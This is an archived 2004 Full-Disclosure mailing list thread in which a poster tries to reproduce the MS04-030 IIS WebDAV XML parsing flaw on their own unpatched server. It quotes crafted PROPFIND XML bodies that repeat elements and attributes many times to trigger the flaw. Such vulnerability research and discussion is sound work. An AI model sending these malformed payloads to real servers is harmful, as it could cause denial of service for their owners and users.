Re: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details

From: nirvana (karmic_nirvana_at_yahoo.com)
Date: 10/13/04

  • Next message: steven: "[Full-Disclosure] Multiple Cross Site Scripting Vulnerabilities in FuseTalk"
    To: full-disclosure@lists.netsys.com
    Date: Wed, 13 Oct 2004 10:51:59 -0700 (PDT)
    
    

    I tried attributes in a single tag too, like...

    <x:elem x:attr="value" x:attr="value" x:attr="value"
    x:attr="value" x:attr="value"...........so on />

    --- nirvana <karmic_nirvana@yahoo.com> wrote:

    > Hi List,
    > I've been trying to reproduce this vulnerability
    > (MS04-030) on my unpatched IIS. I am sending a
    > request
    > with a element which has multiple/many attributes.
    > With my limited knowlegde of WebDAV, I think the
    > attributes per-element can be sent in two ways
    > 1.in one line, in the element tag only
    > 2.in multiple per attribute tags.
    >
    > The request I am sending is something like this (XML
    > Data only from a PROPFIND Request, with multiple
    > tags)...
    >
    > <?xml version="1.0" encoding="utf-8" ?>
    > <D:propfind xmlns:D="DAV:">
    > <D:prop xmlns:ns="DAV:"><ns:displayname/>
    > <ns:displayname>
    > <attrib1>a</attrib1>
    > <attrib1>a</attrib1>
    > .
    > .
    > .
    > .
    > <attrib1>a</attrib1>
    > </ns:displayname>
    > </D:prop>
    > </D:propfind>
    >
    >
    >
    > Plz feel free to rant me if I doin wrong :).
    >
    > Thanks.
    >
    >
    >
    >
    >
    >
    >
    > __________________________________
    > Do you Yahoo!?
    > Read only the mail you want - Yahoo! Mail SpamGuard.
    > http://promotions.yahoo.com/new_mail
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter:
    > http://lists.netsys.com/full-disclosure-charter.html
    >

    __________________________________________________
    Do You Yahoo!?
    Tired of spam? Yahoo! Mail has the best spam protection around
    http://mail.yahoo.com

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: steven: "[Full-Disclosure] Multiple Cross Site Scripting Vulnerabilities in FuseTalk"

    Relevant Pages

    • [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details
      ... The request I am sending is something like this (XML ... Data only from a PROPFIND Request, with multiple ... Read only the mail you want - Yahoo! ... Mail SpamGuard. ...
      (Full-Disclosure)
    • Re: [PATCH] hpsa: SCSI driver for HP Smart Array controllers
      ... Can we just use lists for command management? ... Bit maps are generally more efficient than lists since we touch less data. ... Maybe just add some wrapper around some of blk_queue_start_tag that takes a the bqt and allocates the tag. ... the request queue for the device ...
      (Linux-Kernel)
    • Re: [PATCH] hpsa: SCSI driver for HP Smart Array controllers
      ... Can we just use lists for command management? ... Bit maps are generally more efficient than lists since we touch less data. ... In that patch where does the tag come from? ... the request queue for the device ...
      (Linux-Kernel)
    • Re: Cant get content type to work using Header
      ... A single request can only return a single content type. ... When the browser parses the page, it sees the tag and makes a second request to the server to fetch the image, which has the content-type=image/jpeg. ... You need this in its own script with the src= parameter of your img tag pointing to your script. ...
      (alt.php)
    • Re: Cant get content type to work using Header
      ... A single request can only return a single content type. ... it sees the tag and makes a second request to the server ... pointing to your script. ...
      (alt.php)